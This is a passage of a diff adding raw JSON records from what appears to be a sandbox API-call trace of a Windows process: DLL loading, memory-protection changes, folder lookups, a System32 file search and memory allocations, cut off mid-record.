+ "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000002ec" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74850000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00025000" + }, + { + "name": "Win32Protect", + "value": "0x00000080", + "pretty_value": "PAGE_EXECUTE_WRITECOPY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 383 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74870000" + }, + { + "name": "ModuleName", + "value": "Wldp.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 384 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 385 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 386 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x7486e000" + }, + { + "name": "ModuleName", + "value": "Wldp.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 387 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002ec" + } + ], + "repeated": 0, + "id": 388 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002e8" + } + ], + "repeated": 0, + "id": 389 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e1f000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 390 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtSetInformationProcess", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessInformationClass", + "value": "35" + }, + { + "name": "ProcessInformation", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\x00I\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00A\\x00P\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00p\\x00e\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00u\\x00t\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x00" + } + ], + "repeated": 0, + "id": 391 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x7486e000" + }, + { + "name": "ModuleName", + "value": "Wldp.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 392 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "DDRAW.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 393 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D8.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 394 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D9.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 395 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "misc", + "api": "RtlDosPathNameToNtPathName_U", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "DosFileName", + "value": "C:\\Windows\\SYSTEM32\\Wldp.dll" + } + ], + "repeated": 0, + "id": 396 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000002e8" + }, + { + "name": "DesiredAccess", + "value": "0x00020000", + "pretty_value": "READ_CONTROL" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wldp.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 397 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002e8" + } + ], + "repeated": 0, + "id": 398 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\Wldp" + }, + { + "name": "DllBase", + "value": "0x74850000" + } + ], + "repeated": 0, + "id": 399 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "DDRAW.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 400 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D8.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 401 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D9.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 402 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "misc", + "api": "RtlDosPathNameToNtPathName_U", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "DosFileName", + "value": "C:\\Windows\\SYSTEM32\\windows.storage.dll" + } + ], + "repeated": 0, + "id": 403 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000002e8" + }, + { + "name": "DesiredAccess", + "value": "0x00020000", + "pretty_value": "READ_CONTROL" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\windows.storage.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 404 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002e8" + } + ], + "repeated": 0, + "id": 405 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\windows.storage" + }, + { + "name": "DllBase", + "value": "0x74880000" + } + ], + "repeated": 0, + "id": 406 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "api-ms-win-eventing-provider-l1-1-0.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + } + ], + "repeated": 0, + "id": 407 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "EventSetInformation" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x77020b30" + } + ], + "repeated": 0, + "id": 408 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\wldp" + }, + { + "name": "BaseAddress", + "value": "0x74850000" + }, + { + "name": "InitRoutine", + "value": "0x74858970" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 409 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "api-ms-win-core-synch-l1-2-0.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + } + ], + "repeated": 0, + "id": 410 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "InitializeConditionVariable" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x77054e00" + } + ], + "repeated": 0, + "id": 411 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "SleepConditionVariableCS" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x75777090" + } + ], + "repeated": 0, + "id": 412 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "WakeAllConditionVariable" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7705a560" + } + ], + "repeated": 0, + "id": 413 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 414 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 415 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "ntdll.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76ff0000" + } + ], + "repeated": 0, + "id": 416 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76ff0000" + }, + { + "name": "FunctionName", + "value": "RtlDllShutdownInProgress" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7704f590" + } + ], + "repeated": 0, + "id": 417 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\windows.storage" + }, + { + "name": "BaseAddress", + "value": "0x74880000" + }, + { + "name": "InitRoutine", + "value": "0x74a5a360" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 418 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x75ea6000" + }, + { + "name": "ModuleName", + "value": "SHELL32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 419 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x75ea6000" + }, + { + "name": "ModuleName", + "value": "SHELL32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 420 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 421 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "filesystem", + "api": "SHGetFolderPathW", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Folder", + "value": "0x00000029", + "pretty_value": "CSIDL_SYSTEMX86" + }, + { + "name": "Path", + "value": "C:\\Windows\\SysWOW64" + } + ], + "repeated": 0, + "id": 422 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce684f", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 423 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce684f", + "parentcaller": "0x03ce4b94", + "category": "filesystem", + "api": "SHGetFolderPathW", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Folder", + "value": "0x00000025", + "pretty_value": "CSIDL_SYSTEM" + }, + { + "name": "Path", + "value": "C:\\Windows\\system32" + } + ], + "repeated": 0, + "id": 424 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce2934", + "parentcaller": "0x03ce2415", + "category": "filesystem", + "api": "FindFirstFileExW", + "status": true, + "return": "0x00720f60", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\*" + }, + { + "name": "FirstCreateTimeLow", + "value": "0xc8b10c31" + }, + { + "name": "FirstCreateTimeHigh", + "value": "0x01d5acde" + } + ], + "repeated": 0, + "id": 425 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00747000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 426 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00748000" + }, + { + "name": "RegionSize", + "value": "0x00003000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 427 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0074b000" + }, + { + "name": "RegionSize", + "value": "0x00005000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 428 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00750000" + }, + { + "name": "RegionSize", + "value": "0x00005000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 429 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00755000" + }, + { + "name": "RegionSize", + "value": "0x00005000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 430 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0075a000" + }, + { + "name": "RegionSize", + "value": "0x00005000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 431 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0075f000" + }, + { + "name": "RegionSize", + "value": "0x00005000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 432 + }, + { + "timestamp": "2025-03-07 22:33:08,625", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00764000" + }, + { + "name": "RegionSize", + "value": "0x00005000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 433 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00769000" + }, + { + "name": "RegionSize", + "value": "0x00005000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 434 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0076e000" + }, + { + "name": "RegionSize", + "value": "0x00009000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 435 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": 